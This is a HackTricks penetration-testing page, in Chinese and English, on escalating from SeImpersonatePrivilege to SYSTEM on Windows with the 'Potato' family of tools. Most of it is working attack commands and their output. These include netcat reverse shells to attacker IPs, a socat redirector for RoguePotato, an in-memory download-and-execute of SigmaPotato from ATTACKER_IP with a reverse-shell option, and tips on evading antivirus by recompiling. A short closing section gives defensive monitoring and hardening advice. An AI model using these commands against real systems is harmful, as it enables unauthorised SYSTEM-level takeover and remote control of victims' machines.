RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato

Reading time: 9 minutes

tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

warning

JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards. However, PrintSpoofer, RoguePotato, SharpEfsPotato, GodPotato, EfsPotato, DCOMPotato** can be used to leverage the same privileges and gain NT AUTHORITY\SYSTEM level access. This blog post goes in-depth on the PrintSpoofer tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.

tip

A modern alternative frequently maintained in 2024–2025 is SigmaPotato (a fork of GodPotato) which adds in-memory/.NET reflection usage and extended OS support. See quick usage below and the repo in References.

Related pages for background and manual techniques:

SeImpersonate from High To System

From High Integrity to SYSTEM with Name Pipes

Abusing Tokens

Requirements and common gotchas

下面所有技术都依赖于滥用一个具备 impersonation 能力的特权服务,且运行上下文须拥有下列任一权限:

  • SeImpersonatePrivilege(最常见)或 SeAssignPrimaryTokenPrivilege
  • 如果 token 已经具有 SeImpersonatePrivilege,则不需要高完整性(High integrity)(这在许多服务账户中很常见,例如 IIS AppPool、MSSQL 等)

快速检查权限:

cmd
whoami /priv | findstr /i impersonate

操作说明:

  • PrintSpoofer 需要 Print Spooler 服务运行,并通过本地 RPC 端点 (spoolss) 可达。在经历 PrintNightmare 后禁用 Spooler 的加固环境中,优先使用 RoguePotato/GodPotato/DCOMPotato/EfsPotato。
  • RoguePotato 需要一个在 TCP/135 上可达的 OXID resolver。如果出站被阻断,使用 redirector/port-forwarder(见下面示例)。旧版本需要 -f 标志。
  • EfsPotato/SharpEfsPotato 利用 MS-EFSR;如果一个 pipe 被阻塞,尝试替代的 pipe(lsarpc, efsrpc, samr, lsass, netlogon)。
  • 在调用 RpcBindingSetAuthInfo 时出现 Error 0x6d3 通常表示未知/不支持的 RPC 身份验证服务;尝试不同的 pipe/transport 或确保目标服务正在运行。

快速演示

PrintSpoofer

bash
c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"

--------------------------------------------------------------------------------

[+] Found privilege: SeImpersonatePrivilege

[+] Named pipe listening...

[+] CreateProcessAsUser() OK

NULL

注意:

  • 你可以使用 -i 在当前控制台生成一个交互式进程,或者使用 -c 运行单行命令。
  • 需要 Spooler service。如果被禁用,将会失败。

RoguePotato

bash
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
# In some old versions you need to use the "-f" param
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999

如果出站 135 被阻止,请在你的 redirector 上通过 socat 转发 OXID resolver:

bash
# On attacker redirector (must listen on TCP/135 and forward to victim:9999)
socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999

# On victim, run RoguePotato with local resolver on 9999 and -r pointing to the redirector IP
RoguePotato.exe -r REDIRECTOR_IP -e "cmd.exe /c whoami" -l 9999

SharpEfsPotato

bash
> SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

C:\temp>type C:\temp\w.log
nt authority\system

EfsPotato

bash
> EfsPotato.exe "whoami"
Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]

[+] Current user: NT Service\MSSQLSERVER
[+] Pipe: \pipe\lsarpc
[!] binding ok (handle=aeee30)
[+] Get Token: 888
[!] process with pid: 3696 created.
==============================
[x] EfsRpcEncryptFileSrv failed: 1818

nt authority\system

提示:如果某个 pipe 失败或被 EDR 阻止,请尝试其他受支持的 pipes:

text
EfsPotato <cmd> [pipe]
pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc)

GodPotato

bash
> GodPotato -cmd "cmd /c whoami"
# You can achieve a reverse shell like this.
> GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

注意:

  • 在存在 SeImpersonatePrivilege 时,可在 Windows 8/8.1–11 和 Server 2012–2022 上运行。

DCOMPotato

image

DCOMPotato 提供了两个变体,针对默认使用 RPC_C_IMP_LEVEL_IMPERSONATE 的服务 DCOM 对象。构建或使用提供的二进制文件并运行你的命令:

cmd
# PrinterNotify variant
PrinterNotifyPotato.exe "cmd /c whoami"

# McpManagementService variant (Server 2022 also)
McpManagementPotato.exe "cmd /c whoami"

SigmaPotato (更新的 GodPotato fork)

SigmaPotato 添加了现代化的便利功能,例如通过 .NET 反射进行的内存执行,以及一个 PowerShell reverse shell 辅助程序。

powershell
# Load and execute from memory (no disk touch)
[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://ATTACKER_IP/SigmaPotato.exe"))
[SigmaPotato]::Main("cmd /c whoami")

# Or ask it to spawn a PS reverse shell
[SigmaPotato]::Main(@("--revshell","ATTACKER_IP","4444"))

检测与加固说明

  • 监控那些创建 named pipes 并紧接着调用 token-duplication APIs 再执行 CreateProcessAsUser/CreateProcessWithTokenW 的进程。Sysmon 可以提供有用的遥测:Event ID 1(进程创建)、17/18(named pipe 创建/连接),以及以 SYSTEM 身份生成子进程的命令行。
  • Spooler 加固:在不需要的服务器上禁用 Print Spooler 服务可以防止通过 spoolss 进行的 PrintSpoofer-style 本地强制提升。
  • 服务帐户加固:尽量减少向自定义服务分配 SeImpersonatePrivilege/SeAssignPrimaryTokenPrivilege。考虑在虚拟账户下以最低必要权限运行服务,并在可能的情况下使用 service SID 和写限制 tokens 对其进行隔离。
  • 网络控制:阻止出站 TCP/135 或限制 RPC endpoint mapper 流量可以破坏 RoguePotato,除非存在内部重定向器。
  • EDR/AV:这些工具大多有广泛的签名。重新从源码编译、重命名符号/字符串或使用 in-memory execution 可以降低检测率,但无法绕过健全的行为检测。

参考资料

tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks